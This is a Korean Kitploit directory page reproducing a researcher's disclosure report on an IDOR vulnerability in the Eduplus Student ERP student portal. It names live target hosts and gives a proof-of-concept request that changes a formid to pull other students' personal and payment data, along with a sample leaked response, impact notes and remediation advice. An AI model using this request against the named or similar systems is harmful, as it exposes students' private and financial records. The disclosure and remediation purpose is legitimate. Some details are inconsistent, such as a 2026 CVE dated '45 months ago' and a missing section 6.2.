Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
도구/GitHubGitHub/sharma19d/cve-2026-35678
Vulnerability AnalysisExploitationInformation GatheringWeb SecurityPenetration Testing
GitHubsharma19d/cve-2026-35678

CVE-2026-35678

# Eduplus Student ERP의 IDOR 취약점 상세 연구 보고서 기술 분석, PoC, 영향 평가 및 수정 권장 사항을 포함한 Eduplus Student ERP의 IDOR 취약점에 대한 상세 취약점 연구 보고서입니다.

저장소 보기
45개월 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

취약점 연구 보고서: All Eduplus Student ERP 안전하지 않은 직접 객체 참조 (IDOR)

연구자: Vinay Sharma

1. 요약

본 보고서는 Eduplus Student ERP 플랫폼, 특히 학생 학습자 포털(learnerapi.pceterp.in)에서 식별된 높은 심각도의 보안 취약점에 대해 상세히 설명합니다. 해당 애플리케이션은 시험 양식 제출 엔드포인트에서 범용 안전하지 않은 직접 객체 참조 (IDOR) 취약점을 가지고 있으며, 이로 인해 인증된 사용자(학생)는 양식 식별자를 조작하여 다른 학생의 민감한 개인 및 금융 데이터를 검색할 수 있습니다.

이 취약점은 개인 식별 정보(PII)와 상세한 금융 거래 감사 추적을 포함한 학생 기록의 대규모 데이터 수집을 가능하게 합니다.


2. 취약점 세부 정보

  • 대상 호스트: learnerapi.pceterp.in, learner.zealerp.in, learner.despu.edu.in 등
  • 영향을 받는 엔드포인트: POST /ExamForm/viewSubmitExamForm
  • 취약점 유형:
    • 안전하지 않은 직접 객체 참조 (IDOR) [CWE-639]
  • 취약한 암호화 (하드코딩 키를 사용한 AES-ECB) [CWE-327, CWE-798]
  • 민감한 데이터 노출 [CWE-312]
  • 심각도: 높음 (추정 CVSS v3.1: 7.5 - CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N)

  • 3. 기술 분석

    3.1 안전하지 않은 직접 객체 참조 (IDOR)

    이 취약점은 viewSubmitExamForm 엔드포인트에 존재합니다. 서버는 검색할 레코드를 식별하기 위해 클라이언트가 제공하는 두 가지 매개변수에 의존합니다:

    1. 요청 본문: {"formid": "XXXXX"}
    2. HTTP 헤더: Router-Path: /view-pcu-exam-form/XXXXX

    사용자는 인증되어야 하지만, 서버는 인증된 학생이 요청된 formid와 관련된 데이터를 볼 수 있는 권한이 있는지 확인하지 않습니다. 공격자는 숫자 ID를 반복하여 다른 학생의 기록에 접근할 수 있습니다.

    4. 개념 증명 (PoC)

    4.1 IDOR 악용

    수정된 formid를 사용하여 취약한 엔드포인트에 표준 POST 요청을 보내면 민감한 학생 데이터가 반환됩니다.

    요청:

    root@kitploit:~
    POST /ExamForm/viewSubmitExamForm HTTP/2
    Host: learnerapi.pceterp.in
    Content-Type: application/json
    Router-Path: /view-pcu-exam-form/28984
    ... (인증된 헤더) ...
    
    {"formid":"28984"}
    

    응답 (유출된 데이터 요약):

    root@kitploit:~
    {
      "status": "200",
      "examFormname": "B.Tech - Sem VI - Regular",
      "receipt_no": "REC/2023/54321",
      "feespaiddate": "2023-10-15",
      "ispaymentdone": {
        "username": "[email protected]",
        "received_amount": "1500.0",
        "updation_ip_address": "103.x.x.x",
        "erp_transaction_id": "ERP_998877",
        "bank_transaction_id": "BANK_ABC123",
        "paymentgateway_transaction_id": "PG_XYZ789",
        "learner": {
          "id": "12345"
        }
      }
    }
    
    5
    4
    3
    2
    1

    Idorpoc.mp4 업로드 중…


    5. 영향 평가

    이 취약점의 성공적인 악용으로 인해 다음이 가능합니다:

    • PII 대량 노출: 전체 학생의 이름, 이메일 주소, 학생 ID 및 로그인 IP 주소에 대한 접근.
    • 금융 데이터 유출: 거래 내역, 은행 ID 및 결제 게이트웨이 참조 정보 노출. 이 정보는 매우 민감하며 금융 사기나 사회공학 공격에 사용될 수 있습니다.
    • 학업 프라이버시 침해: 시험 양식, 멘토 배정 및 제출 상태에 대한 무단 접근.

    6. 수정 권장 사항

    6.1 권한 부여 수정 (우선순위: 높음)

    • 서버 측 권한 부여 검사 구현: 백엔드는 요청된 formid가 활성 세션과 연결된 learnerid에 속하는지 확인해야 합니다. 인증된 세션 토큰에 대한 검증 없이 formid 또는 Router-Path 매개변수를 신뢰하지 마십시오.

    6.3 일반적인 강화

    • 데이터 출력 최소화: API가 특정 UI 보기에 필요한 필드만 반환하도록 하십시오. 내부 거래 ID와 IP 주소는 사용자 워크플로에 반드시 필요하지 않은 한 삭제해야 합니다.
    • 세션 보안: 세션 관리를 위한 사용자 정의 암호화 헤더 사용을 검토하고 표준화된 강화된 JWT 또는 보안 HTTP 전용 쿠키 사용을 고려하십시오.
    도구 다운로드